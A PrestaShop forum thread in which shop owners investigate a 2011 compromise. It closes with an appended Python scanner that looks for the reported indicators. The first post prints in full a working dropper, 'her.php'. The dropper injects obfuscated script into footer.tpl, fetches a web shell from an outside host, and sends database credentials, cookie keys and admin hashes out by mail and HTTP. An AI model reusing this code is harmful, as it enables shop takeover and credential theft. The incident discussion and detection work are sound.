PrestaShop Forum

Footer.tpl vulnerability?

199 replies to this topic
#1
Muller

    PrestaShop Apprentice

  • Members
  • 43 posts
Hi all,

I use an SCM system, and I was just about to commit some files when I saw, in the "unversioned" list of files, a new file which I did not remember creating. It's called "her.php" and it sits under the modules directory. So I opened it with a PHP editor, and here is the content:


<?php
error_reporting(0);
$shcode = "{literal}".base64_decode("PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlLmFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO307T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWlmKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgcz0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubGVuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLDEwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDgtbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8sNDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzLW8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctbyw0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDExMy1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4LW8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLDYyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtbywxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMDctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMTAtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLDEwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1vXTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tKGUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=").
"{/literal}";
$shurl = "http://www.c2bill.it/stest/chkpnt/shell.txt";  
$msgurl = "http://www.c2bill.it/stest/chkpnt/sdata.php";
$mails = "samuvel_hitroy@aol.com, preop@gmx.com";
function deletedir($arg){   $d=opendir($arg);  while($f=readdir($d)){     if($f!="."&&$f!=".."){        if(is_dir($arg."/".$f))        deletedir($arg."/".$f);       else         unlink($arg."/".$f);     }  }  rmdir($arg);closedir($d);}
@include("../config/settings.inc.php");
///Host info
$hostvar = "host:".$_SERVER["HTTP_HOST"]."\n"."ref:".$_SERVER["HTTP_REFERER"]."\n"."path:".$_SERVER["SCRIPT_FILENAME"]."\n=====\n";
///Server info
$srvvar =  _DB_SERVER_."\n"._DB_USER_."\n"._DB_PASSWD_."\n"._DB_NAME_."\n"._DB_PREFIX_."\n"._COOKIE_KEY_."\n"._COOKIE_IV_."\n"._PS_VERSION_."\n=====\n";
///GET admin
mysql_connect(_DB_SERVER_,_DB_USER_,_DB_PASSWD_);
mysql_selectdb(_DB_NAME_);
$r = mysql_query("SELECT `email`, `passwd` FROM `"._DB_PREFIX_."employee` WHERE id_profile = 1");
while($ro=mysql_fetch_assoc($r)){$usrs .= $ro['email'].":".$ro['passwd']."\n";}
//Wride sploit
@deletedir("../tools/smarty/compile/");
@deletedir("../tools/smarty/cache/"); 
@deletedir("../tools/smarty_v2/"); 
@deletedir("../tools/smarty_v2/"); 
$fn = "../themes/"._THEME_NAME_."/footer.tpl";
$f = fopen($fn,"r");$ff = fread($f,filesize($fn));fclose($f);
$ff = str_replace("</body>","                                     ".$shcode."</body>",$ff);
$f = fopen($fn,"w");$rf = fwrite($f,$ff);fclose($f); 
if($rf>0) $wrres = "true"; else $wrres = "false";
//write shell
$sh = file_get_contents($shurl);
$shf = "../upload/".md5(date("r")).".php"; 
$f = fopen($shf,"w");$rf = fwrite($f,$sh);fclose($f);
$shf2 = "../download/".md5(date("r")).".php"; 
$f = fopen($shf2,"w");$rf = fwrite($f,$sh);fclose($f);
@unlink("../download/.htaccess");
$msg = $hostvar.$srvvar.$usrs."=====\nTemplate writed:".$wrres."\n=====\nShells:\n".$shf."\n".$shf2."\n=====\n";
@mail($mails,"new shop",$msg);
@file_get_contents($msgurl."?data=".base64_encode($msg));
@unlink(__FILE__);
?>


That looks like they're emailing all the back office user/passwords to the two emails specified at the top of the code.

Did someone hack into my computer and put this file there?
What do you think guys?

I'm running an anti-virus check obviously as I write this...

#2
whitelighter

    PrestaShop Addict

  • Members
  • 589 posts
Weird, I had the same file, created today. It could be a new exploit or a timed virus that downloads this file on a given day. This is definitely created specifically for PrestaShop.

You should check your upload and download directories for php files, that are not named index.php. You should check your theme folder, footer.tpl file. It might have some new javascript at the end.

This file does send the usernames and passwords of employees. But that is useless: the passwords are hashed, so you cannot use them for login. But it also sends your database username and password. You might want to change them just in case. If your MySQL server is accessible externally, they will be able to log in.

#3
Muller

    PrestaShop Apprentice

  • Members
  • 43 posts
Thanks.

I posted this on Reddit at:
http://www.reddit.co...mputer_help_me/

I'm getting help there. I discovered new files in the download and upload directory, as well as modifications in my theme's footer.tpl which I deleted.

The file was only run on my localhost, not on the live server.

#4
Maxence de Flotte

    PrestaShop Apprentice

  • PrestaShop
  • 210 posts
Hi,


What is your hosting service?
What is the FTP manager you used? (FileZilla?)
Was this file on your local machine?


Best regards,
Maxence de Flotte, Core developer, PrestaShop

#5
Muller

    PrestaShop Apprentice

  • Members
  • 43 posts
The file was not placed on the live server, only on my local machine.
I'm running 1.4.3.0.

Please go to the Reddit.com link I posted in my previous reply, as some guys there helped find out what the script actually does.

The question is how it happened, and how we stop it from happening again.

#6
ruilong

    PrestaShop Addict

  • Moderators
  • 690 posts
I have seen the same thing on another shop today.
Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop I found.
Modules and themes for PrestaShop.
E-shop with PrestaShop, including hosting and free installation.

#7
Muller

    PrestaShop Apprentice

  • Members
  • 43 posts

ruilong, on 23 August 2011 - 05:15 PM, said:

I have seen the same thing on another shop today.
Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop I found.

The only modules I use are the ones that came with 1.4.3.0. The only module I downloaded from prestashop.com is their own authorize.net SIM module. That's the only module I installed that did not come with PrestaShop already.

#8
FlyHigh

    PrestaShop Newbie

  • Members
  • 10 posts
I just started using PrestaShop a few days ago to discover what it's all about. It works great, despite the hack today:

* working on an online server, the public_html was protected by .htaccess (this protection was disabled when I found out about it).
* I can't find her.php on the server anymore (in the apache-log I can see it)

Is there any more information I can give to help find out what caused this?

* PrestaShop: 1.4.4.0
* Theme: Matrice

#9
Mike Kranzler

    PrestaShop Superstar

  • PrestaTeam
  • 6082 posts
Hi Muller,
First of all, I want to let you know that we take this sort of situation extremely seriously, and have already assigned it as the top priority to our most qualified developer, Maxence (who as you can see, is already on the case). He is investigating it to try to locate the source, even if it is from an external module. If you would like to speak with him directly, we invite you to MP him to give him any additional information that could be helpful.

I will let you know as soon as I receive more news, but please just know that we are working very hard to ensure that this will not happen again, not to you or anyone else in the PrestaShop community.

-Mike
Mike Kranzler, Community Manager, PrestaShop

Per PrestaShop's rules, requests for assistance sent via PM will not be answered. Please post them as a new thread directly to the forums for assistance.

#10
thehandlestudio

    PrestaShop Apprentice

  • Members
  • 251 posts
I have also had the same thing happen tonight about 1 hour ago and I am looking for the source.

I think .htaccess files have been added, as well as a script in the download folder, but I can't open it.

Regards,

Mark.
The Handle Studio
http://www.thehandlestudio.co.uk

#11
Mike Kranzler

    PrestaShop Superstar

  • PrestaTeam
  • 6082 posts
We're working to find the solution for you, but in the meantime, you may want to check the suggestions posted on the reddit link that Muller posted near the top. Take those suggestions with a grain of salt, but they may be worth exploring on your local machine after a back-up.

-Mike

#12
FlyHigh

    PrestaShop Newbie

  • Members
  • 10 posts
I've checked the Apache usage logs and couldn't find any IP address other than mine.
There was a GET command to her.php ... [23/Aug/2011:17:44:21 +0200] "GET /modules/her.php HTTP/1.1" 200 304 ...

In Download & Upload is a new file named: f48be302135d80a289c0e56fae37952e.php
These files are also dated 23/aug 17:44 - the same time footer.tpl changed.

Did it happen at the same time for everyone?

#13
designguy79

    PrestaShop Newbie

  • Members
  • 10 posts
This also happened to me, running 1.4.3

I couldn't find the "her.php" but my footer.tpl was definitely changed.

The only 3rd party module I had installed was jbx_menu.

Did anyone else have this happen while running 1.4.4?

#14
kapowchis

    PrestaShop Newbie

  • Members
  • 21 posts
Also happening in 1.4.4

#15
designguy79

    PrestaShop Newbie

  • Members
  • 10 posts
Dang it, I hope they can find the source of the problem soon. Just launched the site live, otherwise I would take it down. Might have to anyway!

Also, I am not familiar with the correct PrestaShop .htaccess file. How do I know what to remove from there? (I have cleaned everything else up)

#16
AKJV

    PrestaShop Addict

  • Moderators
  • 691 posts
Wow, this looks serious.
I discovered today that I have the same issue. I thought that I was the only one with a compromised PrestaShop installation, until I read this topic.

I'm running a 1.4.4 version, updated from 1.4.3

Today, I saw that my FO was messed up: the Category block was empty, my slideshow had stopped working and the footer had shifted upwards. When I used Firebug to check the rendered HTML code, I saw links to 2 external sites. I'm afraid I don't remember anymore which sites those were linking to...

I checked my footer.tpl and found weird and suspicious code at the bottom. In addition, php files were added to the /upload and /download folders. Also, the .htaccess file (to deny access) in the /download folder was gone.

In my case, this happened right after I had uploaded an HTML email file to my /mails/xx folder. This file was from someone else on the forum who I'm helping with an email layout problem. So my initial reaction was that this HTML file was somehow infected, but seeing similar issues with others, I wonder if that's the case...

I've attached both footer.tpl (with just the weird code) and one of added php files so the developers can have a look at it.


PC Avenue - Multimedia PC specialist - http://pcavenue.nl


#17
Rolo Tomasi

    PrestaShop Newbie

  • Members
  • 21 posts
I'm running 1.4.4 and my site went down at 2:00pm UK time. My webhost has just pointed me to this thread and I have the same files added to my upload and download folders along with the addition to the footer.tpl file.

#18
kapowchis

    PrestaShop Newbie

  • Members
  • 21 posts
The footer.tpl file and a file named menu.3 within the "cache" folder of the "jbx_menu" module were modified at the same time, so I don't know if that's relevant or not.

#19
AKJV

    PrestaShop Addict

  • Moderators
  • 691 posts
I'm using jbx_menu as well...
Can all the people who have posted here and encountered the same problem confirm that they are using this menu?


#20
whitelighter

    PrestaShop Addict

  • Members
  • 589 posts
For anyone who finds a her.php file under their modules directory, you should do the following:
- Check the file creation time, write this down and delete the file from your server.
- Go to your apache raw access logs. You should be able to access it using hosting control panel.
- Find the line that corresponds to the file creation time you wrote down earlier.
- Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here.
This data would help identify the root of the problem.

To see if you have been attacked, check the following:
- Is there any php file under your uploads or downloads directory apart from index.php?
- Is there a strange javascript at the end of your footer.tpl file?

If any of the above happens, change your mysql username and password.
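A check for the indicators collected in this thread (her.php under modules/, PHP files other than index.php in upload/ and download/, the removed download/.htaccess, and the script block spliced in before </body> in footer.tpl), written as an added example for this topic and not code posted by anyone in it; the theme name "prestashop" and the sample tree the helper builds are constructed assumptions.

```python
# Added example: scan a PrestaShop 1.4 tree for the indicators described in this
# thread. The theme name and the sample tree below are constructed assumptions.
import os
import re
import tempfile

DROPPER = os.path.join("modules", "her.php")
WRITABLE_DIRS = ("upload", "download")
# The injected footer payload sits inside {literal}...{/literal} right before </body>
INJECT_RE = re.compile(r"\{literal\}\s*<script>.*?</script>\s*\{/literal\}\s*</body>", re.S)


def scan_shop(root, theme):
    """Return a list of (indicator, relative path) findings for the shop at `root`."""
    findings = []
    if os.path.isfile(os.path.join(root, DROPPER)):
        findings.append(("dropper present", DROPPER))
    for d in WRITABLE_DIRS:
        full = os.path.join(root, d)
        if not os.path.isdir(full):
            continue
        for name in sorted(os.listdir(full)):
            if name.endswith(".php") and name != "index.php":
                findings.append(("unexpected php file", os.path.join(d, name)))
    if not os.path.isfile(os.path.join(root, "download", ".htaccess")):
        findings.append(("download/.htaccess missing", os.path.join("download", ".htaccess")))
    footer_rel = os.path.join("themes", theme, "footer.tpl")
    footer = os.path.join(root, footer_rel)
    if os.path.isfile(footer):
        with open(footer, encoding="utf-8", errors="replace") as fh:
            if INJECT_RE.search(fh.read()):
                findings.append(("script injected before </body>", footer_rel))
    return findings


def build_sample_shop():
    """Constructed sample tree reproducing the symptoms reported in the thread."""
    root = tempfile.mkdtemp()
    for d in ("modules", "upload", "download", os.path.join("themes", "prestashop")):
        os.makedirs(os.path.join(root, d))
    open(os.path.join(root, "modules", "her.php"), "w").close()
    for d in WRITABLE_DIRS:
        open(os.path.join(root, d, "index.php"), "w").close()
        open(os.path.join(root, d, "f48be302135d80a289c0e56fae37952e.php"), "w").close()
    # download/.htaccess deliberately absent, as reported by several posters
    with open(os.path.join(root, "themes", "prestashop", "footer.tpl"), "w") as fh:
        fh.write('<div id="footer"></div>\n{literal}<script>/* injected */</script>{/literal}</body></html>')
    return root
```

Running `scan_shop(build_sample_shop(), "prestashop")` lists all five findings; on a clean install it returns an empty list.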